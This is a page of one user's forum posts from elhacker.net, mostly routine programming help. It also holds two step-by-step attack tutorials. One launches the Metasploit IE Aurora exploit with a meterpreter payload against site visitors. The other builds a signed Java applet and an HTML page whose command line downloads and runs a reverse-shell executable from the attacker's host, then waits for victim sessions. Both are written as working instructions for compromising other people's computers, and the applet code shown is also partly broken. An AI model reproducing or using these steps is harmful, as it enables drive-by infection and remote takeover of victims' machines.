elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 [355] 356 357 358 359 360 361 362 363 364 365 366 367 368
3541  Programación / PHP / Re: Como verificó esto en php? en: 20 Enero 2010, 17:04 pm
WTF!
3542  Programación / PHP / Re: Crear Carpetas en php en: 19 Enero 2010, 23:27 pm
Dije que perdon por el POST anterior ¬¬

Hablando de Applet, mirad si te sirve, http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection-t281594.0.html
3543  Programación / PHP / Re: Crear Carpetas en php en: 19 Enero 2010, 23:23 pm
Emmm
Código
  1. mkdir("carpeta");  //recomedado
ó
Código
  1. system("mkdir carpeta");

Pues, no lei buen, y es en el P.C... Perdon por el POST
3544  Programación / Bases de Datos / Re: consultas con sql o acces en: 19 Enero 2010, 23:11 pm
Joder, no entendi. Esto:

Código
  1. SELECT * FROM DATE_SAMPLE WHERE SAMPLE_DATE = '2003-04-09'
3545  Seguridad Informática / Hacking / [Metasploit + 0-day IE] Exploit IE_Aurora en: 19 Enero 2010, 22:48 pm
[Metasploit + 0-day IE] Exploit IE_Aurora




Descargad el Exploit IE_Aurora.rb de http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb. Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora
Código:
                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7957 updated 27 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 27 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) >

Miramos que opciones tiene y cuales son requeridos
Código:
msf exploit(ie_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ie_aurora) >

Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
Código:
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2
SRVHOST => 192.168.0.2
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) >

Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
Código:
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.0.2:8080/
[*] Server started.

Video:


Se debe a: a que cuando un usuario carga manualmente un sitio Web, código ‭‬javascript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.

Fuente: http://www.sahw.com/wp/archivos/2010/01/16/sobre-la-ultima-vulnerabilidad-de-internet-explorer-consejos-practicos-para-usuarios/
3546  Media / Diseño Gráfico / Re: Como poner una imagen de fondo en otra (como marco de agua ) en Photohsop en: 19 Enero 2010, 04:00 am
http://fotografiapractica.com/montaje17.php
http://www.photoshop-designs.com/foro/viewtopic.php?t=518
http://es.onsoftware.com/p/como-fusionar-imagenes-photoshop

Saludos!
3547  Seguridad Informática / Hacking / [Metasploit] Java Applet Infection en: 19 Enero 2010, 02:48 am
[Metasploit] Java Applet Infection


[Metasploit By: trashhgoo & Shell Root]



Está infeccion permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos.

Primero instalaremos el JDK de JAVA para la compilacion del codigo en JAVA para la ejecución del codigo remoto.
Código:
shellroot@ShellRoot-desktop:~$ sudo apt-get install sun-java6-jdk 

Tambien es necesario la instalacion del Apache2
Código:
shellroot@ShellRoot-desktop:~$ sudo apt-get install apache2

Ahora para que nos quede organizado y no, se nos pierdan archivos, crearemos una carpeta dentro de la carpeta personal. (/home/shellroot/)
Código:
shellroot@ShellRoot-desktop:~$ mkdir JavaAppletInfect

Nos movemos a la carpeta que acabamos de crear y bajamos el siguiente archivo http://spl0it.org/files/makeapplet.sh, no sin antes guardar el siguiente codigo como MSFcmd.java
Código
  1. import java.applet.*;
  2. import java.awt.*;
  3. import java.io.*;
  4.  
  5. public class MSFcmd extends Applet {
  6.   public void init() {
  7.      Process f;
  8.      String first = getParameter("first");
  9.  
  10.      Try {
  11.         f = Runtime.getRuntime().exec("first");
  12.      }Catch(IOException e) {
  13.         e.printStackTrace();
  14.      }
  15.      Process s;
  16.   }
  17. }

Ahora estamos listos para descargar y ejecutar el archivo makeapplet.sh. Así:
Código:
shellroot@shellroot-desktop:~/JavaAppletInfect$ wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh
--2010-01-18 20:07:25--  http://spl0it.org/files/makeapplet.sh
Resolviendo spl0it.org... 205.138.55.249
Conectando a spl0it.org|205.138.55.249|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2184 (2,1K) [application/x-sh]
Guardando: «makeapplet.sh»

100%[======================================>] 2.184       --.-K/s   en 0,02s  

2010-01-18 20:07:26 (99,9 KB/s) - `makeapplet.sh' guardado [2184/2184]

shellroot@shellroot-desktop:~/JavaAppletInfect$ ./makeapplet.sh

Despues de ello, nos perdia una información para configurar nuestro certificado. Llenamos la informacion como queramos y al finalizar correctamente, se crearán los certificados del Script.
Código:
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
¿Cuáles son su nombre y su apellido?
  [Unknown]:  MSFcmd
¿Cuál es el nombre de su unidad de organización?
  [Unknown]:  Microsoft
¿Cuál es el nombre de su organización?
  [Unknown]:  Microsoft Organization
¿Cuál es el nombre de su ciudad o localidad?
  [Unknown]:  Medellin
¿Cuál es el nombre de su estado o provincia?
  [Unknown]:  Colombia
¿Cuál es el código de país de dos letras de la unidad?
  [Unknown]:  CO
¿Es correcto CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Medellin, ST=Colombia, C=CO?
  [no]:  si

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificado almacenado en el archivo <mycertificate.cer>
[+] Done


Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server.

<applet width='1' height='1' code=MSFcmd.class archive=SignedMSFcmd.jar> </applet>

shellroot@shellroot-desktop:~

Ahora tenemos que copiar los archivos SignedMSFcmd.Jar y MSFcmd.Class dentro de la carpeta /var/www, despues de ello, iniciamos el Serividor Apache. Así:
Código:
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp SignedMSFcmd.jar /var/www
shellroot@shellroot-desktop:~/JavaAppletInfect$ sudo cp MSFcmd.class /var/wwwshellroot@shellroot-desktop:~/JavaAppletInfect$ aparche2ctl start
No command 'aparche2ctl' found, did you mean:
 Command 'apache2ctl' from package 'apache2.2-common' (main)
aparche2ctl: command not found
shellroot@shellroot-desktop:~/JavaAppletInfect$ apache2ctl start
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
(13)Permission denied: make_sock: could not bind to address [::]:80
(13)Permission denied: make_sock: could not bind to address 0.0.0.0:80
no listening sockets available, shutting down
Unable to open logs
shellroot@shellroot-desktop:~/JavaAppletInfect$

Despues de realizar todo lo anterior, precedemos a realizar un ejecutable con un PAYLOAD en este caso usaré windows/meterpreter/reverse_tcp
Código:
shellroot@shellroot-desktop:~$ cd msf3
shellroot@shellroot-desktop:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.142.136 LPORT=1234 R | ./msfencode -t exe -o MSFcmd.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

shellroot@shellroot-desktop:~/msf3$

Movemos el ejecutable dentro de la carpeta /var/www y configuramos los permisos del archivo.
Código:
shellroot@shellroot-desktop:~/msf3$ sudo cp ./MSFcmd.exe /var/www/
shellroot@shellroot-desktop:~/msf3$ sudo chmod a+x /var/www/MSFcmd.exe
shellroot@shellroot-desktop:~/msf3$

Ahora el archivo (index.html) que se encuentra dentro de la carpeta /var/www, modificamos el contenido y le añadimos el Script Malicioso. Así:
Código
  1. <html>
  2. <head><title></title></head>
  3. <body>
  4.   <applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>
  5.  
  6.   <param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\MSFcmd.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://192.168.142.136/MSFcmd.exe C:\windows\MSFcmd.exe'> </applet>
  7. </body>
  8. </html>

Ahora ingresamos a la Consola del Metasploit, y usamos el Auxiliar multi/handler, ingresamos los datos del PAYLOAD anterior con los mismo datos, y ejecutamos el exploit en segundo plano. Así:
Código:
shellroot@shellroot-desktop:~/msf3$ ./msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf exploit(handler) > back
msf > use multi/handler
reverse_tcpmsf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.142.136
LHOST => 192.168.142.136
msf exploit(handler) > set LPORT 1234
LPORT => 1234
msf exploit(handler) > save
Saved configuration to: /home/shellroot/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...

y esperamos a que alguien ingrese a la URL, para recibir la Session del Meterpreter.

PD: La victima al ejecutar se le mostratá el siguiente certificado Web. :D


Gr3tz: Rcart, Messerschmitt, Xzite





Mirando los tipos de infecciones que se pueden realizar para Inyectar un PAYLOAD, encontré un Papper de AnalyseR, publicado por Hacker_Zero, Mirad. (http://foro.elhacker.net/hacking_avanzado/poc_infeccion_mediante_java_applet_y_vbscript-t240306.0.html). Pero mirando el MSFUnleashed, me di cuenta que era el mismo tipo de infección, Mirad (http://www.offensive-security.com/metasploit-unleashed/Java-Applet-Infection-Method) así que no se quien es... :·P, igual no me importa... x·D
3548  Seguridad Informática / Hacking / Re: Shell colection :D en: 18 Enero 2010, 17:41 pm
Y cuales WebShell contiene? o de que se trata el Pack?
3549  Programación / Bases de Datos / Re: Problema al conectarme a Mysql en: 17 Enero 2010, 17:35 pm
Emmm supongo que estas usando un String de Conexion algo así:
Código:
Server=myServerAddress;Database=myDataBase;Uid=myUsername;Pwd=myPassword;

Mirad: http://www.connectionstrings.com/mysql



Indentad:
Código
  1. MySQLDriverCS.MySQLConnectionString connString = new MySQLDriverCS.MySQLConnectionString("SERVER", "DB", "USER", "PWD");
  2. MySQLDriverCS.MySQLConnection conn = new MySQLDriverCS.MySQLConnection(cs.AsString);

Fuente: http://www.dotnethell.it/forum/messages.aspx?ThreadID=18180
3550  Programación / Scripting / Re: Duda sobre python...? en: 16 Enero 2010, 23:03 pm
Lo de la generación de ejecutables: Para generar archivos .exe para MS Windows, hay que usar la utilidad py2exe. Esto genera un ejecutable que incluye el intérprete y el programa a interpretar, por lo que a efectos prácticos es compilar el programa. Para Linux existen cosas parecidas, pero no son prácticas porque la inmensa mayoría de los sistemas Linux tienen Python instalado o es muy fácil hacer que se instale como parte de la instalación de nuestro programa.

Fuente: http://es.wikibooks.org/wiki/Inmersi%C3%B3n_en_Python/Como_se_compila_python



Lo de la interfaz: http://mundogeek.net/archivos/2008/11/24/interfaces-graficas-de-usuario-en-python/
Páginas: 1 ... 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 [355] 356 357 358 359 360 361 362 363 364 365 366 367 368
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines